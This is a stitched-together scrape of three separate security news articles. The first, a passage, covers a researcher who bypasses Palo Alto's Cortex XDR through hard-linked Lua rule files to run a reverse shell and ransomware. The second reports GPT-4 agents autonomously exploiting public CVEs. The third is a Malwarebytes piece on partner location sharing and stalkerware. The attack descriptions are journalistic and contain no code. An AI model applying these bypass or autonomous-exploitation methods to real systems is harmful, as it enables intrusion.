"The program was not aware that this file was pointing to the same location in the hard disk as the original Lua file, and this allowed me to edit the original content file," he explains. "So I created a hard link to the files, edited and removed some rules. And I saw that as I removed them — and did another little thing that caused the app to load new rules—I could load a vulnerable driver. And from there, the whole computer was mine."

After taking complete control in his proof of concept attack, Cohen recalls, "What I did first was change the protection password on the XDR so it cannot be removed. I also blocked any communication to its servers."

Meanwhile, "Everything seems like it's working. I can hide the malicious activities from the user. Even for an action which would've been prevented, the XDR won't provide a notification. The endpoint user will see the green marks that indicate everything is OK, while underneath I'm running my malware."

The malware he decided to run was, first, a reverse shell, enabling full control over the targeted machine. Then he successfully deployed ransomware, right under the program's nose.

**The Fix Palo Alto Didn't Make**

Palo Alto Networks was receptive to Cohen's research, working closely with him to understand the exploit and develop fixes.

There was one vulnerability in his attack chain, however, that they chose to leave as is: the fact that Cortex's Lua files are stored entirely in plaintext, with no encryption whatsoever, despite their highly sensitive nature.

That seems alarming, but the reality is that encryption wouldn't be much of a deterrent for attackers, so after discussing the matter, he and the security company agreed that they didn't need to change that. As he notes, "The XDR eventually needs to understand what to do. So even if it's encrypted, at some point in its operation it will need to decrypt those files in order to read them. So attackers could just catch the content of the files then. It would be one more step for me in order to read those files, but I can still read them."

He also says that other XDR platforms are likely susceptible to the same kind of attack.

"Other XDRs will implement this differently, maybe," he says. "Maybe the files will be encrypted. But no matter what they will do, I can always bypass it."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Evil XDR: Researcher Turns Palo Alto Software Into Perfect Malware

Existing AI technology can allow hackers to automate exploits for public vulnerabilities in minutes flat. Very soon, diligent patching will no longer be optional.

Source: Rokas Tenys via Shutterstock

AI agents equipped with GPT-4 can exploit most public vulnerabilities affecting real-world systems today, simply by reading about them online.

New findings out of the University of Illinois Urbana-Champaign (UIUC) threaten to radically enliven what's been a somewhat slow 18 months in artificial intelligence (AI)-enabled cyber threats. Threat actors have thus far used large language models (LLMs) to produce phishing emails, along with some basic malware, and to aid in the more ancillary aspects of their campaigns. Now, though, with only GPT-4 and an open source framework to package it, they can automate the exploitation of vulnerabilities as soon as they hit the presses.

"I'm not sure if our case studies will help inform how to stop threats," admits Daniel Kang, one of the researchers. "I do think that cyber threats will only increase, so organizations should strongly consider applying security best practices."

**GPT-4 vs. CVEs**

To gauge whether LLMs could exploit real-world systems, the team of four UIUC researchers first needed a test subject.

Their LLM agent consisted of four components: a prompt, a base LLM, a framework — in this case ReAct, as implemented in LangChain — and tools such as a terminal and code interpreter.

The agent was tested on 15 known vulnerabilities in open source software (OSS). Among them: bugs affecting websites, containers, and Python packages. Eight were given "high" or "critical" CVE severity scores. There were 11 that were disclosed past the date at which GPT-4 was trained, meaning this would be the first time the model was exposed to them.

With only their security advisories to go on, the AI agent was tasked with exploiting each bug in turn. The results of this experiment painted a stark picture.

Of the 10 models evaluated — including GPT-3.5, Meta's Llama 2 Chat, and more — nine could not hack even a single vulnerability.

GPT-4, however, successfully exploited 13, or 87% of the total.

It only failed twice for utterly mundane reasons. CVE-2024-25640, a 4.6 CVSS-rated issue in the Iris incident response platform, survived unscathed because of a quirk in the process of navigating Iris' app, which the model couldn't handle. Meanwhile, the researchers speculated that GPT-4 missed with CVE-2023-51653 — a 9.8 "critical" bug in the Hertzbeat monitoring tool because its description is written in Chinese.

As Kang explains, "GPT-4 outperforms a wide range of other models on many tasks. This includes standard benchmarks (MMLU, etc.). It also seems that GPT-4 is much better at planning. Unfortunately, since OpenAI hasn't released the training details, we aren't sure why."

**GPT-4 Good**

As threatening as malicious LLMs might be, Kang says, "At the moment, this doesn't unlock new capabilities an expert human couldn't do. As such, I think it's important for organizations to apply security best practices to avoid getting hacked, as these AI agents start to be used in more malicious ways."

If hackers start utilizing LLM agents to automatically exploit public vulnerabilities, companies will no longer be able to sit back and wait to patch new bugs (if ever they were). And they might have to start using the same LLM technologies as well as their adversaries will.

But even GPT-4 still has some ways to go before it's a perfect security assistant, warns Henrik Plate, security researcher for Endor Labs. In recent experiments, Plate tasked ChatGPT and Google's Vertex AI with identifying samples of OSS as malicious or benign, and assigning them risk scores. GPT-4 outperformed all other models when it came to explaining source code and providing assessments for legible code, but all models yielded a number of false positives and false negatives.

Obfuscation, for example, was a big sticking point. "It looked to the LLM very often as if \[the code\] was deliberately obfuscated to make a manual review hard. But often it was just reduced in size for legitimate purposes," Plate explains.

"Even though LLM-based assessment should not be used instead of manual reviews," Plate wrote in one of his reports, "they can certainly be used as one additional signal and input for manual reviews. In particular, they can be useful to automatically review larger numbers of malware signals produced by noisy detectors (which otherwise risk being ignored entirely in case of limited review capabilities)."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

GPT-4 Can Exploit Most Vulns Just by Reading Threat Advisories

Location sharing is popular among couples. But is it something you want in your own relationship?

Every relationship has its disagreements. Who takes out the trash and washes the dishes? Who plans the meals and writes out the grocery list? And when is it okay to start tracking one another’s location?  

Location sharing is becoming the norm between romantic partners—50% of people valued location sharing in their relationships, according to recent research from Malwarebytes—and plenty of couples have found ways to track one another’s location, with consent, in a respectful and transparent way.

But, as a cybersecurity, privacy, and identity protection company, Malwarebytes is concerned with risk, and location sharing carries significant risks within many types of relationships.

There are new relationships in which the rules around privacy and sharing are still being agreed upon, old relationships in which power imbalances are deeply entrenched, and, of course, abusive relationships in which non-consensual tracking and surveillance are used as levers of control.

As a company—and not a relationship counselor—Malwarebytes cannot endorse any reasons for location sharing between romantic partners. But Malwarebytes can provide guidance on what safe location sharing looks like, including a requirement for consent.

Importantly, Malwarebytes can also remind readers about one simple, often-forgotten fact in this conversation: You don’t have to engage in location sharing if you do not want to.

It really is as simple as that. Do not agree to location sharing in your relationship if:

*   You are being pressured, coerced, or harassed into sharing your location.
*   You do not trust or feel comfortable sharing your location with your partner.  
*   You do not want to.

As the reasons for location sharing are valid for many couples, the reasons against it are just as valid, too. You have the right to determine the rules in your own relationship, and that includes the digital decisions that impact your feelings of privacy, safety, and trust.

****Safety, security, and convenience****

According to research conducted last year by Malwarebytes, location tracking among partners is popular in North America—and even more popular amongst younger generations.

When polling more than 1,000 people about their attitudes and behaviors around online privacy and cybersecurity, a full 50% agreed or strongly agreed with the statement that “monitoring my spouse’s/significant other’s online activity and/or location makes me feel they are safer.”

Similarly, 42% agreed or strongly agreed with the statement that “being able to track my spouse’s/significant other’s location when they are away is extremely important to me.” This sentiment was higher amongst Gen Z—49% felt the same way compared to the general population.

As to why location tracking has become so popular, there is little doubt. It’s about safety (or, at least, the feeling of it).

On Reddit, the question of location tracking between partners is frequently posed and is just as frequently answered: “I think it should be fine for safety reasons,” said one user in a the most popular response to a thread.

In writing for the media platform Her Campus, one Pennsylvania State University student said that, if she already shares her location with her friends for safety, “why would I not share it with someone I am involved with romantically?”

For some of the editorial staff at the healthy living brand Poosh, location sharing also provided convenience.  

“If I want to call my boyfriend for something, sometimes I’ll check his location first (if he’s at the office, for example, I won’t call),” wrote Erika Harwood, managing editor. “Or if he tells me he’s on his way home and it seems to be taking unusually long, it’s easier to just check his location and see if he’s stuck in traffic.”

Harwood continued:

“Basically, it all boils down to me trying to eliminate as many phone calls from my day as possible.”

What these explanations all share is purpose and consent. The people featured here have told their partners about location sharing, and they have identified specific reasons to engage in this practice. Because of this, these situations are hardly cause for alarm.

What Malwarebytes hopes to draw attention to, however, are starkly different situations.

****Coercion, control, and crisis****

Location “sharing” implies two partners who consensually share their locations with one another. But as Malwarebytes discovered last year, location “sharing” isn’t the only activity that some people engage in—it’s also location spying.

According to the same survey last year, 41% of all people admitted to monitoring their partner in some way without their partner’s permission.

That includes 16% of people who non-consensually “tracked my spouse’s/significant other’s location through an app or Bluetooth tracker (like Apple AirTags, Tile, Find My)” and 13% who non-consensually “installed monitoring software/apps on spouse’s/significant other’s devices (e.g., Life360).”

The harms here are obvious.

Non-consensual location tracking in a relationship is a clear invasion of privacy. It puts sensitive information into one partner’s hands without the other partner knowing it, and the nature of the information itself can be used to harass and stalk someone—especially after a breakup.

Non-consensual location tracking is also present in domestic abuse, particularly in instances where one partner is being spied upon with the use of “stalkerware” apps. And while those who deploy these types of invasive apps are not guaranteed to be physically abusive against their partners, several documented cases highlight the risk.

As Danielle Citron, professor of law at UVA, wrote back in 2015 about what she called “cyber stalking apps”:

“A woman fled her abuser who was living in Kansas. Because her abuser had installed a cyber stalking app on her phone, her abuser knew that she had moved to Elgin, Illinois. He tracked her to a shelter and then a friend’s home where he assaulted her and tried to strangle her. In another case, a woman tried to escape her abusive husband, but because he had installed a stalking app on her phone, he was able to track down her and her children. The man murdered his two children. In 2013, a California man, using a spyware app, tracked a woman to her friend’s house and assaulted her.”

These cases may sound extreme, but they should not be ignored. They reveal that it isn’t location sharing itself which is harmful, but rather that harmful relationships will lead to harmful forms of location tracking.

Be sure that, if you do engage in location sharing, it is with someone who you trust, on both of your agreed terms, and in a way that you can turn off the location sharing at any point in the future.

****What’s the answer?****

Your real-time location is extraordinarily sensitive information, and as such, access to it should be understood as a privilege, not a right. No romantic partner has a “right” to your location just because their previous partners practiced location sharing. No romantic partner should coerce or harass you into location sharing. And no, the refusal to share your location, at any stage of the relationship, is not a “red flag.”

If you do decide to share your location with your partner, be sure to follow these guidelines:

*   **Have an open conversation about location sharing with one another**. You must obtain consent from your partner if you’re going to share your locations. Spying on your partner’s location without their consent is a breach of trust.
*   **Have a reason why you’re engaging in location sharing**. Many problems in a relationship will not be solved by location sharing. Have a firm reason why you want to share locations and what value it will provide. If you do not have a good reason, you may not need location sharing at all.
*   **Set up rules about location sharing**. Location sharing can be enabled on a case-by-case basis for, say, music festivals, vacations, or solo hiking trips. It can also be enabled between partners indefinitely.
*   **Check in periodically about whether it is working**. Just because you agreed to location sharing a year ago does not mean you cannot revisit the topic. See how location sharing feels and then see if you still want it later in your relationship.

As every couple has its own rules and behaviors for success, there is no single answer to whether you should share your location with your partner. You know your partner—and yourself—best to answer this question. Be safe, whatever option you choose.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#apple